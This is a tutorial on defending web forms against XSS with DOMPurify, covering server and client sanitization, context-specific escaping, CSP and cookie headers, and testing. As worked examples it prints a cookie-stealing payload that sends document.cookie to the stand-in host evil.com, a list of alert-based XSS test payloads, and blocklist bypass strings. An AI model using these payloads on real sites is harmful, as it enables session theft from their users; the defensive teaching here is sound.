How to Sanitize User Input

Stop attackers from injecting malicious code through your forms

TL;DR (20 minutes)

Never trust user input. Use DOMPurify to sanitize HTML on both client and server. Define strict allowlists for tags and attributes. Sanitize before storing AND before rendering. Escape output in the right context (HTML, URL, JavaScript).

Prerequisites

  • Node.js 18+ installed
  • A React, Next.js, or Node.js project
  • Basic understanding of XSS vulnerabilities
  • npm or yarn package manager

Why Sanitization Matters

User input is the primary attack vector for XSS (Cross-Site Scripting) attacks. When unsanitized input is rendered in the browser, attackers can inject scripts that steal cookies, redirect users, or modify page content.

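Real Attack Example: A user submits <img src=x onerror="fetch('https://evil.com/steal?c='+document.cookie)"> as their "bio". Without sanitization, the script runs in the browser of every visitor who views that bio and sends the attacker any cookies readable from JavaScript (those not marked HttpOnly), which often includes the session cookie.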

Step-by-Step Guide

1. Install DOMPurify

DOMPurify is a widely used, actively maintained HTML sanitization library. The dompurify package needs a browser DOM, so for server-side use install isomorphic-dompurify, which wraps it with jsdom:

# For client-side only
npm install dompurify
# Type definitions: only needed for older DOMPurify releases that do not bundle their own
npm install @types/dompurify --save-dev

# For server-side (Next.js, Node.js)
npm install isomorphic-dompurify

2. Create a sanitization utility

Create a reusable sanitization module with strict defaults:

// lib/sanitize.ts
import DOMPurify from 'isomorphic-dompurify';

// Strict config for user-generated content
const STRICT_CONFIG = {
  ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p', 'br', 'ul', 'ol', 'li'],
  ALLOWED_ATTR: [],
  ALLOW_DATA_ATTR: false,
};

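// Config that allows links (for comments, bios)
const WITH_LINKS_CONFIG = {
  ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p', 'br', 'ul', 'ol', 'li', 'a'],
  ALLOWED_ATTR: ['href'], // target and rel are set by the hook below, never by users
  ALLOW_DATA_ATTR: false,
};

// Force links to open safely. The hook sets attributes on the parsed DOM node
// after DOMPurify has filtered it. String-replacing the sanitized HTML instead
// could break out of an attribute value that happens to contain "<a ".
// Hooks are global to this DOMPurify instance, so this runs for every sanitize call.
DOMPurify.addHook('afterSanitizeAttributes', (node) => {
  if (node.nodeName === 'A' && node.hasAttribute('href')) {
    node.setAttribute('target', '_blank');
    node.setAttribute('rel', 'noopener noreferrer');
  }
});

export function sanitizeStrict(dirty: string): string {
  return DOMPurify.sanitize(dirty, STRICT_CONFIG);
}

export function sanitizeWithLinks(dirty: string): string {
  return DOMPurify.sanitize(dirty, WITH_LINKS_CONFIG);
}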

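export function sanitizePlainText(dirty: string): string {
  // Strip ALL tags and keep only text. The result is still an HTML string:
  // characters such as & and < come back entity-encoded (&amp;, &lt;).
  return DOMPurify.sanitize(dirty, { ALLOWED_TAGS: [] });
}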

export function escapeHtml(str: string): string {
  // For contexts where you need escaped HTML entities
  const map: Record<string, string> = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#039;',
  };
  return str.replace(/[&<>"']/g, m => map[m]);
}

3. Sanitize in your API routes

Always sanitize on the server before storing data:

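// app/api/comments/route.ts
import { sanitizeWithLinks, sanitizePlainText } from '@/lib/sanitize';
import { db } from '@/lib/db'; // Assumed location of your database client; adjust to your project
import { z } from 'zod';

const CommentSchema = z.object({
  content: z.string().min(1).max(5000),
  authorName: z.string().min(1).max(100),
});

export async function POST(request: Request) {
  // A malformed JSON body makes request.json() reject; treat it as invalid input
  const body = await request.json().catch(() => null);
  const result = CommentSchema.safeParse(body);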

  if (!result.success) {
    return Response.json({ error: 'Invalid input' }, { status: 400 });
  }

  // Sanitize before storing
  const sanitizedContent = sanitizeWithLinks(result.data.content);
  const sanitizedName = sanitizePlainText(result.data.authorName);

  const comment = await db.comment.create({
    data: {
      content: sanitizedContent,
      authorName: sanitizedName,
    },
  });

  return Response.json(comment, { status: 201 });
}

4. Sanitize when rendering (defense in depth)

Even if you sanitize on input, sanitize again when rendering. This protects against database compromises or bugs:

// components/Comment.tsx
import DOMPurify from 'dompurify';

interface CommentProps {
  content: string;
  authorName: string;
}

export function Comment({ content, authorName }: CommentProps) {
  // Sanitize again before rendering, allowing the same tags as at storage time
  const safeContent = DOMPurify.sanitize(content, {
    ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p', 'br', 'ul', 'ol', 'li', 'a'],
    ALLOWED_ATTR: ['href', 'target', 'rel'],
  });

  return (
    <div className="comment">
      <h4>{authorName}</h4> {/* React escapes this automatically */}
      <div dangerouslySetInnerHTML={{ __html: safeContent }} />
    </div>
  );
}

5. Handle different contexts

Different contexts require different sanitization:

// URL context - validate protocol
function sanitizeUrl(url: string): string {
  try {
    const parsed = new URL(url);
    // Only allow http and https
    if (!['http:', 'https:'].includes(parsed.protocol)) {
      return '#';
    }
    return parsed.href;
  } catch {
    return '#';
  }
}

// Usage
<a href={sanitizeUrl(userProvidedUrl)}>Link</a>

// CSS context - use allowlists
const SAFE_COLORS = ['red', 'blue', 'green', 'purple', 'orange'];
function sanitizeColor(color: string): string {
  return SAFE_COLORS.includes(color.toLowerCase()) ? color : 'gray';
}

// JSON context - validate structure
// MySchema is a placeholder: define a zod schema for the shape you expect
function sanitizeJsonString(jsonStr: string): object | null {
  try {
    const parsed = JSON.parse(jsonStr);
    // Validate against expected schema
    return MySchema.parse(parsed);
  } catch {
    return null;
  }
}
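
The TL;DR also lists the JavaScript context, which the examples above do not cover. The following is a minimal sketch, assuming you need to embed server data inside an inline script block. JSON.stringify on its own leaves a closing script tag in the data intact, so the characters that could end the block or start markup are replaced with Unicode escapes. The helper name serializeForScript is hypothetical, not a library API.

```typescript
// JavaScript context - escape characters that can break out of a <script> block.
// serializeForScript is a hypothetical helper name used for illustration.
const SCRIPT_ESCAPES: Record<string, string> = {
  '<': '\\u003c',
  '>': '\\u003e',
  '&': '\\u0026',
  '\u2028': '\\u2028',
  '\u2029': '\\u2029',
};

export function serializeForScript(data: unknown): string {
  const json = JSON.stringify(data);
  if (json === undefined) {
    // JSON.stringify returns undefined for values such as functions or undefined
    throw new TypeError('Value is not JSON-serializable');
  }
  // The escaped form is still valid JSON and parses back to the same value
  return json.replace(/[<>&\u2028\u2029]/g, (ch) => SCRIPT_ESCAPES[ch] ?? ch);
}
```

The returned string contains no angle brackets or ampersands, and JSON.parse on it yields the original data, so the page script can read the value without any extra decoding step.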

Security Checklist

  • Sanitize ALL user input, including hidden fields and headers
  • Use allowlists (not blocklists) for HTML tags and attributes
  • Sanitize on the server (primary) AND client (defense in depth)
  • Never pass user input to eval(), assign it unsanitized to innerHTML, or interpolate it into HTML or script strings with template literals
  • Validate URLs before using in href or src attributes
  • Set Content Security Policy headers to block inline scripts
  • Use httpOnly cookies so injected scripts can't read session tokens
  • Log sanitization events to detect attack attempts
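
Two of the checklist items are HTTP response headers. Below is a sketch of what they might look like, assuming a per-request nonce for any inline scripts you do need. The helper name buildSecurityHeaders, the cookie name session, and the specific policy directives are illustrative assumptions; adapt them to your application.

```typescript
import { randomBytes } from 'node:crypto';

interface SecurityHeaders {
  nonce: string;
  headers: Record<string, string>;
}

// Hypothetical helper: builds header values for a single response.
export function buildSecurityHeaders(sessionToken: string): SecurityHeaders {
  // A fresh, unpredictable nonce per response; inline scripts without it are blocked
  const nonce = randomBytes(16).toString('base64');

  const csp = [
    "default-src 'self'",
    `script-src 'self' 'nonce-${nonce}'`, // no 'unsafe-inline', so injected inline scripts do not run
    "object-src 'none'",
    "base-uri 'self'",
  ].join('; ');

  // HttpOnly hides the cookie from document.cookie; Secure restricts it to HTTPS
  const cookie = `session=${encodeURIComponent(sessionToken)}; HttpOnly; Secure; SameSite=Lax; Path=/`;

  return {
    nonce,
    headers: {
      'Content-Security-Policy': csp,
      'Set-Cookie': cookie,
    },
  };
}
```

The nonce is returned alongside the headers so the rendering code can attach it to the script tags it emits itself. These headers limit the damage of a missed payload; they do not replace sanitization.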

How to Verify It Worked

Test your sanitization with these common XSS payloads:

// Test payloads - none of these should execute
const testPayloads = [
  '<script>alert("XSS")</script>',
  '<img src=x onerror=alert("XSS")>',
  '<svg onload=alert("XSS")>',
  '<a href="javascript:alert(\'XSS\')">click</a>',
  '<div onmouseover="alert(\'XSS\')">hover</div>',
  '<iframe src="javascript:alert(\'XSS\')">',
  '<body onload=alert("XSS")>',
  '<input onfocus=alert("XSS") autofocus>',
  '<marquee onstart=alert("XSS")>',
  '<details open ontoggle=alert("XSS")>',
];

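// Automated test (sanitizeStrict comes from lib/sanitize.ts in step 2)
// Heuristic check: flags script/iframe tags, inline event handlers, and javascript: URLs
const UNSAFE_PATTERN = /<script|<iframe|\son\w+\s*=|javascript:/i;

testPayloads.forEach(payload => {
  const sanitized = sanitizeStrict(payload);
  console.log(`Input: ${payload}`);
  console.log(`Output: ${sanitized}`);
  console.log(`Safe: ${!UNSAFE_PATTERN.test(sanitized)}`);
  console.log('---');
});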

Pro Tip: Use browser DevTools to inspect rendered HTML. Right-click the element containing user content and select "Inspect". Verify that no script tags, event handlers, or javascript: URLs are present.

Common Errors and Troubleshooting

Error: DOMPurify is not defined (server-side)

// Problem: Using browser DOMPurify on server
import DOMPurify from 'dompurify'; // Wrong for server

// Solution: Use isomorphic version
import DOMPurify from 'isomorphic-dompurify'; // Works everywhere

Error: Content is completely stripped

// Problem: Overly restrictive config
const config = { ALLOWED_TAGS: [] }; // Strips everything

// Solution: Allow the tags you need
const config = {
  ALLOWED_TAGS: ['p', 'br', 'b', 'i', 'em', 'strong'],
  ALLOWED_ATTR: [],
};

Error: Links are not clickable (href is stripped)

// Problem: href not in allowed attributes
const config = {
  ALLOWED_TAGS: ['a'],
  ALLOWED_ATTR: [], // Missing href!
};

// Solution: Include href in allowed attributes
const config = {
  ALLOWED_TAGS: ['a'],
  ALLOWED_ATTR: ['href'],
};

Error: Sanitization is too slow

// Problem: Sanitizing on every render
function Comment({ content }) {
  // This runs on every render!
  const safe = DOMPurify.sanitize(content);
  return <div dangerouslySetInnerHTML={{ __html: safe }} />;
}

// Solution: Memoize or sanitize once when storing
import { useMemo } from 'react';

function Comment({ content }) {
  const safe = useMemo(() => DOMPurify.sanitize(content), [content]);
  return <div dangerouslySetInnerHTML={{ __html: safe }} />;
}
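
useMemo only helps inside a React component. For server-side rendering or other non-React code, a small bounded cache around the sanitizer can give a similar effect. This is a sketch, assuming the sanitizer is a pure string-to-string function; memoizeSanitizer and its maxEntries parameter are hypothetical names.

```typescript
type Sanitizer = (dirty: string) => string;

// Hypothetical helper: wraps a sanitizer with a least-recently-used cache.
export function memoizeSanitizer(sanitize: Sanitizer, maxEntries = 500): Sanitizer {
  const cache = new Map<string, string>();

  return (dirty: string): string => {
    const hit = cache.get(dirty);
    if (hit !== undefined) {
      // Re-insert so this entry becomes the most recently used
      cache.delete(dirty);
      cache.set(dirty, hit);
      return hit;
    }

    const clean = sanitize(dirty);
    cache.set(dirty, clean);

    if (cache.size > maxEntries) {
      // A Map iterates in insertion order, so the first key is the least recently used
      const oldest = cache.keys().next().value;
      if (oldest !== undefined) cache.delete(oldest);
    }
    return clean;
  };
}
```

You would wrap the real sanitizer once at module level, for example memoizeSanitizer((html) => DOMPurify.sanitize(html)), and call the wrapped function from your render path. Because the cache is keyed by the full input string, keep maxEntries modest when inputs are large.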

Frequently Asked Questions

Is React's automatic escaping enough?

React escapes content in JSX expressions like {userInput}, which is safe. But if you use dangerouslySetInnerHTML, render to non-JSX contexts, or interpolate into URLs/attributes, you need explicit sanitization.

Should I sanitize on input or output?

Both. Sanitize on input (before storing) to keep your database clean and reduce storage of malicious content. Sanitize on output (before rendering) as defense in depth in case your database is compromised or a bug bypasses input sanitization.

Why not use a blocklist instead of allowlist?

Blocklists are impossible to maintain. There are hundreds of ways to inject scripts (event handlers, data URLs, obscure tags, encoding tricks). Attackers constantly find new bypasses. Allowlists define exactly what's safe, blocking everything else.
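
To make the bypass problem concrete, here is a sketch of a naive blocklist that only strips script elements. The function is deliberately flawed and exists purely for illustration; do not use it.

```typescript
// Deliberately flawed: a blocklist that removes <script>...</script> pairs.
export function naiveBlocklist(html: string): string {
  return html.replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, '');
}

// Bypass 1: there is no <script> tag, so the event handler passes through untouched.
export const viaHandler = naiveBlocklist('<img src=x onerror=alert(1)>');

// Bypass 2: removing the inner pair splices the outer fragments into a new <script> tag.
export const viaNesting = naiveBlocklist('<scr<script></script>ipt>alert(1)</script>');
```

viaHandler comes back unchanged, and viaNesting comes back as a complete script element. An allowlist avoids both cases because neither img with onerror nor script is on the list in the first place.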

Can I trust input from authenticated users?

No. Authenticated users can still be attackers, or their accounts could be compromised. Always sanitize regardless of authentication status.

How do I sanitize Markdown content?

First convert Markdown to HTML using a library like marked, then sanitize the HTML output with DOMPurify. Markdown permits raw inline HTML, so never render the converted output without sanitizing it.
